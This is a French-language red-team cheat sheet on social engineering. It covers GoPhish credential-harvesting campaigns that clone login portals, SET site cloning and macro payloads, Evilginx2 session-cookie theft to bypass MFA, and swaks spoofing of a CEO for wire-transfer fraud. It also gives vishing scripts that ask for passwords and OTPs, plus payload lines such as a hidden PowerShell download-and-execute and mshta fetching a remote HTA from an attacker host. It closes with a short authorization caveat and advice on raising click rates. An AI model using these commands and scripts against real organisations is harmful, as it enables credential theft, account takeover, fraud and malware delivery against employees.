Social Engineering — Phishing & Pretexting
Campagnes de phishing, spear phishing, pretexting, vishing — SET & GoPhish
Reconnaissance préalable (OSINT pour SE)
# Cartographier l'organisation : LinkedIn pour organigramme, noms, postes, outils utilisés# → identifier les cibles prioritaires (DAF, RH, IT helpdesk, C-suite)# Découvrir le pattern d'emails (prenom.nom@company.com, p.nom@company.com, etc.)# Hunter.io : https://hunter.io/domain/{{TARGET_DOMAIN}}# Récolte automatiséetheHarvester -d {{TARGET_DOMAIN}} -b googlelinkedinbinghunter# Énumérer les utilisateurs valides via SMTPsmtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t {{MAIL_SERVER}}smtp-user-enum -M RCPT -U emailstxt -t {{MAIL_SERVER}} -p 25# Vérifier la configuration anti-spoofing avant toute campagnedig TXT {{TARGET_DOMAIN}} # SPF recorddig TXT _dmarc{{TARGET_DOMAIN}} # DMARC policydig TXT _domainkey{{TARGET_DOMAIN}} # DKIM
Si DMARC est absent ou en mode p=none, le spoofing d'adresse expéditeur est possible sans contrôle.
GoPhish — Campagne de phishing
# Démarrer GoPhish/gophish# Interface web : https://localhost:3333# Credentials par défaut : admin / (voir logs au premier démarrage)
Workflow GoPhish :
- Sending Profile — configurer le relay SMTP (SendGrid, AWS SES, serveur dédié)
- Landing Page — cloner le portail cible avec
Import Sitedepuis l'URL réelle (VPN, OWA, SSO)- Activer "Capture Submitted Data" + "Capture Passwords"
- Redirect URL vers la vraie page après soumission
- Email Template — imiter les communications légitimes
- IT support : "Action requise — Votre compte expire dans 24h"
- RH : "Fiche de paie disponible — authentifiez-vous"
- Direction : "Document confidentiel partagé"
- Users & Groups — importer la liste CSV des cibles
- Campaign — lancer et monitorer en temps réel
# Export des résultats# Dashboard → Campaigns → Results → Export CSV# Métriques : emails envoyés, ouverts, clics, credentials soumis, signalements
SET (Social Engineering Toolkit)
# Lancer SETsetoolkit# Credential Harvester (cloner un site)# 1) Social-Engineering Attacks# → 2) Website Attack Vectors# → 3) Credential Harvester Attack Method# → 2) Site Cloner# Entrer l'URL à cloner et l'IP d'écoute ({{LHOST}})# Spear Phishing avec payload# 1) Social-Engineering Attacks# → 1) Spear-Phishing Attack Vectors# → 1) Perform a Mass Email Attack# Générer un payload macro Word# 1) Social-Engineering Attacks# → 3) Infectious Media Generator# → 1) File-Format Exploits
Evilginx2 (reverse proxy — bypass 2FA)
# Démarrer evilginx2evilginx2 -p /usr/share/evilginx/phishlets/# Configurer le domaine de phishingconfig domain {{PHISHING_DOMAIN}}config ip {{LHOST}}# Charger un phishlet (Office365, Gmail, LinkedIn, GitHub...)phishlets hostname o365 {{PHISHING_DOMAIN}}phishlets enable o365# Créer une URL de leurrelures create o365lures get-url 0# Monitorer les sessions capturées (session tokens + cookies)sessionssessions 1
Evilginx2 agit comme proxy MitM : il capture les session cookies après authentification MFA, permettant de rejouer la session sans connaître le second facteur.
Email spoofing et pretexting
# Test de spoofing avec swaksswaks--to victim{{TARGET_DOMAIN}}--from ceo{{TARGET_DOMAIN}}--server {{MAIL_SERVER}}--header "Subject: Action urgente requise"--body "Merci de traiter ce virement en priorité."# Vérifier la délivrabilité avant envoi# mail-tester.com, mxtoolbox.com/emailhealth# Enregistrement d'un domaine typosquat# company.com → cornpany.com, company-support.com, company-helpdesk.com
Scénarios de pretexting courants :
| Prétexte | Cible | Objectif | |----------|-------|----------| | IT Support — "compte compromis" | Tous employés | Credentials / accès VPN | | Audit interne — "vérification accès" | Managers | Accès systèmes sensibles | | RH — "mise à jour IBAN" | DAF | Fraude au virement | | Direction — "document urgent" | Assistants | Clic sur pièce jointe | | Livraison colis — "confirmation adresse" | Tous | Données personnelles |
Vishing (phishing vocal)
# Caller ID spoofing via SIP trunk ou services dédiés (SpoofCard, MySudo)# Script type support IT :# "Bonjour, je suis Marc du support IT. Nous détectons une connexion# suspecte depuis [pays] sur votre compte. Pour sécuriser votre accès,# j'ai besoin de vérifier votre identité — pouvez-vous me confirmer# votre mot de passe temporaire reçu par SMS ?"# Objectifs vishing :# - Obtenir un OTP / code 2FA en temps réel# - Convaincre d'installer un "outil de diagnostic" (AnyDesk, TeamViewer)# - Récupérer des informations d'annuaire interne
Payloads de phishing courants
# LNK file — exécution PowerShell cachée# Cible du raccourci :powershell -WindowStyle Hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}/payload.ps1')"# HTA file — delivery via lien dans emailmshta http//{{LHOST}}/shell.hta# Macro Office (.docm/.xlsm) — voir 13-client-side.mdx# ISO/IMG — bypass Mark-of-the-Web# Les fichiers montés depuis un ISO n'héritent pas de Zone.Identifier# → contient DLL + LNK, aucun avertissement SmartScreenmkisofs -o payloadiso -J -r /path/to/payload_files/
Formats par taux de détection croissant (2024) : .iso < .lnk < .hta < .docm < .exe
Le phishing sans autorisation explicite et écrite est une infraction pénale. L'autorisation doit lister les employés ciblables, les vecteurs autorisés (email, téléphone, SMS), et les limites (ex. : pas de credential harvesting sur des comptes réels de production).
Les campagnes les plus efficaces usurpent des processus internes avec un sentiment d'urgence — "Votre compte sera suspendu dans 24h" ou "Virement requis avant 17h". Personnaliser avec le prénom de la cible, le nom de son manager (OSINT LinkedIn) et des références à des outils internes identifiés augmente significativement le taux de clic.